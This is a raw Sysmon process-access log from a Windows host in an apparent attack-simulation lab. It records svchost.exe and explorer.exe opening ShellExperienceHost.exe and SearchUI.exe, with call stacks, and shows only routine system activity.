22:52:55.849{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.849{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.849{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.849{05ADC7E1-229F-6039-0D00-00000000AD01}6205508C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.849{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-1E7A-603D-D07D-00000000AD01}57966688C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-1E7A-603D-D07D-00000000AD01}57966688C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.832{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37528|C:\Windows\System32\TwinUI.dll+37448|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x80000000000000001694362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 